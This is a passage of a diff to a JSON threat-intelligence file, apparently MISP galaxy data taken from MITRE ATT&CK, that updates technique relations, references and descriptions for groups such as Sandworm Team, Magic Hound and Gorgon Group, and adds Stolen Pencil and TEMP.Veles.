"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "9dbdadb6-fdbf-490f-a35f-38762d06a0d2", + "dest-uuid": "454fe82d-6fd2-4ac6-91ab-28a33fe01369", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2286,7 +2630,7 @@ "type": "uses" }, { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "dest-uuid": "e8268361-a599-4e45-bd3f-71c8c7e700c0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2307,7 +2651,7 @@ "type": "uses" }, { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2321,14 +2665,14 @@ "type": "uses" }, { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "e8268361-a599-4e45-bd3f-71c8c7e700c0", + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2365,13 +2709,6 @@ ], "type": "uses" }, - { - "dest-uuid": "bb3c1098-d654-4620-bf40-694386d28921", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "cb7bcf6f-085f-41db-81ee-4b68481661b5", "tags": [ @@ -2379,12 +2716,26 @@ ], "type": "uses" }, + { + "dest-uuid": "bb3c1098-d654-4620-bf40-694386d28921", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "463f68f1-5cde-4dc2-a831-68b73488f8f4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "c5574ca0-d5a4-490a-b207-e4658e5fd1d7", @@ -2418,7 +2769,7 @@ "type": "uses" }, { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2432,7 +2783,7 @@ "type": "uses" }, { - "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2470,9 +2821,9 @@ "refs": [ "https://attack.mitre.org/groups/G0034", "https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html", + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/", "https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf", - "https://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/", - "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/" + "https://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/" ], "synonyms": [ "Sandworm Team", @@ -2541,7 +2892,42 @@ "type": "uses" }, { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2561,27 +2947,6 @@ ], "type": "uses" }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", "tags": [ @@ -2590,14 +2955,14 @@ "type": "uses" }, { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2610,26 +2975,12 @@ ], "type": "uses" }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "894aab42-3371-47b1-8859-a4a074c804c8", @@ -2641,11 +2992,11 @@ "external_id": "G0044", "refs": [ "https://attack.mitre.org/groups/G0044", - "http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates", "https://securelist.com/winnti-more-than-just-a-game/37029/", "https://securelist.com/games-are-over/70991/", "http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf", - "https://401trg.com/burning-umbrella/" + "https://401trg.com/burning-umbrella/", + "http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates" ], "synonyms": [ "Winnti Group", @@ -2748,7 +3099,7 @@ "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2769,14 +3120,14 @@ "type": "uses" }, { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2801,7 +3152,7 @@ "value": "Gamaredon Group - G0047" }, { - "description": "[Charming Kitten](https://attack.mitre.org/groups/G0058) is an Iranian cyber espionage group that has been active since approximately 2014. They appear to focus on targeting individuals of interest to Iran who work in academic research, human rights, and media, with most victims having been located in Iran, the US, Israel, and the UK. [Charming Kitten](https://attack.mitre.org/groups/G0058) usually tries to access private email and Facebook accounts, and sometimes establishes a foothold on victim computers as a secondary objective. The group's TTPs overlap extensively with another group, [Rocket Kitten](https://attack.mitre.org/groups/G0059), resulting in reporting that may not distinguish between the two groups' activities. (Citation: ClearSky Charming Kitten Dec 2017)", + "description": "[Charming Kitten](https://attack.mitre.org/groups/G0058) is an Iranian cyber espionage group that has been active since approximately 2014. They appear to focus on targeting individuals of interest to Iran who work in academic research, human rights, and media, with most victims having been located in Iran, the US, Israel, and the UK. [Charming Kitten](https://attack.mitre.org/groups/G0058) usually tries to access private email and Facebook accounts, and sometimes establishes a foothold on victim computers as a secondary objective. The group's TTPs overlap extensively with another group, [Magic Hound](https://attack.mitre.org/groups/G0059), resulting in reporting that may not distinguish between the two groups' activities. (Citation: ClearSky Charming Kitten Dec 2017)", "meta": { "external_id": "G0058", "refs": [ @@ -2838,9 +3189,9 @@ "refs": [ "https://attack.mitre.org/groups/G0059", "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf", "http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf", - "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations", - "https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf" + "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations" ], "synonyms": [ "Magic Hound", @@ -2925,35 +3276,7 @@ "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2967,35 +3290,7 @@ "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "d3df754e-997b-4cf9-97d4-70feb3120847", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3009,7 +3304,42 @@ "type": "uses" }, { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3022,6 +3352,76 @@ ], "type": "uses" }, + { + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d3df754e-997b-4cf9-97d4-70feb3120847", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cb69b20d-56d0-41ab-8440-4a4b251614d4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ @@ -3037,49 +3437,14 @@ "type": "uses" }, { - "dest-uuid": "cb69b20d-56d0-41ab-8440-4a4b251614d4", + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", + "dest-uuid": "fbd727ea-c0dc-42a9-8448-9e12962d1ab5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3093,14 +3458,14 @@ "type": "uses" }, { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3112,24 +3477,104 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, + } + ], + "uuid": "f9d6633a-55e6-4adc-9263-6ae080421a13", + "value": "Magic Hound - G0059" + }, + { + "description": "[Stolen Pencil](https://attack.mitre.org/groups/G0086) is a threat group likely originating from DPRK that has been active since at least May 2018. The group appears to have targeted academic institutions, but its motives remain unclear.(Citation: Netscout Stolen Pencil Dec 2018)", + "meta": { + "external_id": "G0086", + "refs": [ + "https://attack.mitre.org/groups/G0086", + "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/" + ], + "synonyms": [ + "Stolen Pencil" + ] + }, + "related": [ { - "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "fbd727ea-c0dc-42a9-8448-9e12962d1ab5", + "dest-uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "389735f1-f21c-4208-b8f0-f8031e7169b8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6aabc5ec-eae6-422c-8311-38d45ee9838a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" } ], - "uuid": "f9d6633a-55e6-4adc-9263-6ae080421a13", - "value": "Magic Hound - G0059" + "uuid": "7a0d4c09-dfe7-4fa2-965a-1a0e42fedd70", + "value": "Stolen Pencil - G0086" }, { "description": "[Gorgon Group](https://attack.mitre.org/groups/G0078) is a threat group consisting of members who are suspected to be Pakistan-based or have other connections to Pakistan. The group has performed a mix of criminal and targeted attacks, including campaigns against government organizations in the United Kingdom, Spain, Russia, and the United States. (Citation: Unit 42 Gorgon Group Aug 2018)", @@ -3152,21 +3597,7 @@ "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "da04ac30-27da-4959-a67d-450ce47d9470", + "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3180,14 +3611,7 @@ "type": "uses" }, { - "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3208,14 +3632,35 @@ "type": "uses" }, { - "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", + "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "da04ac30-27da-4959-a67d-450ce47d9470", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3229,7 +3674,28 @@ "type": "uses" }, { - "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "dest-uuid": "7cd0bc75-055b-4098-a00e-83dc8beaff14", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b4d80f8b-d2b9-4448-8844-4bef777ed676", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3248,17 +3714,172 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + } + ], + "uuid": "1f21da59-6a13-455b-afd0-d58d0a5a7d27", + "value": "Gorgon Group - G0078" + }, + { + "description": "[TEMP.Veles](https://attack.mitre.org/groups/G0088) is a Russia-based threat group that has targeted critical infrastructure. The group has been observed utilizing TRITON, a malware framework designed to manipulate industrial safety systems.(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018)(Citation: FireEye TEMP.Veles JSON April 2019)", + "meta": { + "external_id": "G0088", + "refs": [ + "https://attack.mitre.org/groups/G0088", + "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html ", + "https://www.fireeye.com/content/dam/fireeye-www/blog/files/TRITON_Appendix_C.html", + "https://dragos.com/resource/xenotime/", + "https://pylos.co/2019/04/12/a-xenotime-to-remember-veles-in-the-wild/" + ], + "synonyms": [ + "TEMP.Veles", + "XENOTIME" + ] + }, + "related": [ + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" }, { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62166220-e498-410f-a90a-19d4339d4e99", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "54a649ff-439a-41a4-9856-8d144a2551ba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c16e5409-ee53-4d79-afdc-4099dc9292df", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "00d0b012-8a03-410e-95de-5826bf542de6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "795c1a92-3a26-453e-b99a-6a566aa94dc6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "20a66013-8dab-4ca3-a67d-766c842c561c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" } ], - "uuid": "1f21da59-6a13-455b-afd0-d58d0a5a7d27", - "value": "Gorgon Group - G0078" + "uuid": "9538b1a4-4120-4e2d-bf59-3b11fcab05a4", + "value": "TEMP.Veles - G0088" }, { "description": "[FIN10](https://attack.mitre.org/groups/G0051) is a financially motivated threat group that has targeted organizations in North America since at least 2013 through 2016. The group uses stolen data exfiltrated from victims to extort organizations. (Citation: FireEye FIN10 June 2017)", @@ -3301,20 +3922,6 @@ ], "type": "uses" }, - { - "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ @@ -3322,13 +3929,6 @@ ], "type": "uses" }, - { - "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ @@ -3336,12 +3936,40 @@ ], "type": "uses" }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "3433a9e8-1c47-4320-b9bf-ed449061d1c3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "fbe9387f-34e6-4828-ac28-3080020c597b", @@ -3396,8 +4024,8 @@ "external_id": "G0013", "refs": [ "https://attack.mitre.org/groups/G0013", - "https://securelist.com/the-naikon-apt/69953/", - "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", + "https://securelist.com/the-naikon-apt/69953/" ], "synonyms": [ "APT30" @@ -3439,13 +4067,6 @@ ], "type": "uses" }, - { - "dest-uuid": "43213480-78f7-4fb3-976f-d48f5f6a4c2a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "b1de6916-7a22-4460-8d26-6b5483ffaa2a", "tags": [ @@ -3460,6 +4081,13 @@ ], "type": "uses" }, + { + "dest-uuid": 